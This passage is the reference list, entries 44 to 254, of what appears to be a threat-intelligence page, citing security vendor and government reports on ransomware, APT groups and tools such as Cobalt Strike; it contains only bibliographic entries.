  44. Lee, S. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019. 

  45. BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022. 

  46. Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. 

  47. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE. Retrieved June 19, 2020. 

  48. Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022. 

  49. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. 

  50. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. 

  51. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. 

  52. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. 

  53. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018. 

  54. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. 

  55. Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020. 

  56. Gonzalez, I., Chavez I., et al. (2022, May 9). Examining the Black Basta Ransomware’s Infection Routine. Retrieved March 7, 2023. 

  57. Inman, R. and Gurney, P. (2022, June 6). Shining the Light on Black Basta. Retrieved March 8, 2023. 

  58. Trend Micro. (2022, September 1). Ransomware Spotlight Black Basta. Retrieved March 8, 2023. 

  59. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022. 

  60. Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022. 

  61. Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020. 

  62. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021. 

  63. Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing. Retrieved January 7, 2021. 

  64. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. 

  65. MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023. 

  66. Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022. 

  67. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. 

  68. Lancaster, T. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. 

  69. Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020. 

  70. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022. 

  71. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. 

  72. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. 

  73. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. 

  74. Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017. 

  75. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020. 

  76. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021. 

  77. Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019. 

  78. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. 

  79. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. 

  80. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020. 

  81. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020. 

  82. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. 

  83. The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. 

  84. Brumaghin, E. and Grady, C. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. 

  85. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. 

  86. Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7's Monkey Thief. Retrieved July 27, 2020. 

  87. Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019. 

  88. Faou, M. and Dumont, R. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. 

  89. CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021. 

  90. Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022. 

  91. Platt, J. and Reeves, J. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019. 

  92. Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. 

  93. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. 

  94. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. 

  95. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. 

  96. Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. 

  97. Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019. 

  98. Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018. 

  99. Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019. 

  100. Horejsi, J. (2018, April 4). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018. 

  101. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019. 

  102. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. 

  103. Biasini, N., et al. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022. 

  104. Falcone, R., et al. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022. 

  105. S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022. 

  106. Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021. 

  107. Victor, K. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading. Retrieved May 26, 2020. 

  108. Szappanos, G. and Brandt, A. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020. 

  109. MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022. 

  110. Rascagneres, P. (2017, May 3). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. 

  111. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022. 

  112. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. 

  113. CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020. 

  114. ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. 

  115. Brumaghin, E., et al. (2017, November 2). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018. 

  116. Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015. 

  117. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022. 

  118. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. 

  119. Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019. 

  120. Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021. 

  121. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  122. Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020. 

  123. Tudorica, R. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021. 

  124. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019. 

  125. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018. 

  126. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018. 

  127. Muhammad, I. and Unterbrink, H. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021. 

  128. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019. 

  129. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023. 

  130. Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021. 

  131. Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022. 

  132. Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. 

  133. Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018. 

  134. Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019. 

  135. Glyer, C., et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020. 

  136. Lee, B. and Falcone, R. (2018, June 6). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. 

  137. Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021. 

  138. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. 

  139. Marczak, B. and Scott-Railton, J. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016. 

  140. Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018. 

  141. Falcone, R., et al. (2018, August 2). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018. 

  142. Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. 

  143. Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019. 

  144. Kaspersky Lab’s Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018. 

  145. Malhotra, A. and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022. 

  146. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. 

  147. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020. 

  148. Singh, S., et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018. 

  149. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018. 

  150. Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018. 

  151. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020. 

  152. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. 

  153. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019. 

  154. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. 

  155. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019. 

  156. CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. 

  157. DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023. 

  158. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022. 

  159. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. 

  160. Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. 

  161. Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. 

  162. Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. 

  163. Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. 

  164. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017. 

  165. Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020. 

  166. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018. 

  167. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019. 

  168. Donohue, B., Nickels, K., Michaud, P., Bodkins, A., Chapman, T., Lambert, T., Felling, J., Rainey, K., Haag, M., Graeber, M., and Didier, A. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020. 

  169. DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020. 

  170. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. 

  171. Goody, K., Kennelly, J., Shilko, J., Elovitz, S., and Bienstock, D. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020. 

  172. FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017. 

  173. Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021. 

  174. Ahl, I. (2017, June 6). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. 

  175. Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014. 

  176. Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022. 

  177. Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020. 

  178. Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021. 

  179. Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. 

  180. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  181. CISA, FBI, CNMF. (2020, October 27). Alert (AA20-301A): North Korean Advanced Persistent Threat Focus: Kimsuky. https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. 

  182. KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022. 

  183. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022. 

  184. SecureWorks. (2019, August 27). LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019. 

  185. Gorelik, M. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. 

  186. The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022. 

  187. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. 

  188. Dunwoody, M. and Carr, N. (2016, September 27). No Easy Breach. DerbyCon 2016. Retrieved October 4, 2016. 

  189. ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022. 

  190. Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022. 

  191. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. 

  192. Kaspersky Lab’s Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016. 

  193. GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020. 

  194. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. 

  195. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. 

  196. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022. 

  197. DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks. Retrieved September 29, 2021. 

  198. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018. 

  199. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. 

  200. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. 

  201. Accenture iDefense Unit. (2019, March 5). Mudcarp’s Focus on Submarine Technologies. Retrieved August 24, 2021. 

  202. Slowik, J. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020. 

  203. Brady, S. W. (2020, October 15). United States v. Yuriy Sergeyevich Andrienko et al. Retrieved November 25, 2020. 

  204. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019. 

  205. Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018. 

  206. Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. 

  207. Carr, N. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017. 

  208. Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018. 

  209. Security Response Attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019. 

  210. Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. 

  211. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. 

  212. Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. 

  213. Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016. 

  214. Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018. 

  215. Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020. 

  216. Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020. 

  217. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. 

  218. Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020. 

  219. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. 

  220. Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021. 

  221. Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021. 

  222. Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017. 

  223. Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021. 

  224. Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020. 

  225. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. 

  226. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. 

  227. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019. 

  228. FireEye Intelligence. (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. 

  229. Miller, S., et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. 

  230. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019. 

  231. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018. 

  232. Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019. 

  233. Klijnsma, Y. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018. 

  234. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. 

  235. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. 

  236. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018. 

  237. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. 

  238. Bohannon, D. and Carr, N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. 

  239. Elovitz, S. and Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. 

  240. Zugec, M. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021. 

  241. Skulkin, O. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. 

  242. Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020. 

  243. Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. 

  244. Cherepanov, A. (2018, October 4). Nomadic Octopus: Cyber espionage in Central Asia. Retrieved October 13, 2021. 

  245. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. 

  246. Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. 

  247. Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. 

  248. CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. 

  249. MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers. Retrieved January 5, 2021. 

  250. Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020. 

  251. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021. 

  252. Dantzig, M. v. and Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. 

  253. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023. 

  254. Venere, G. and Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.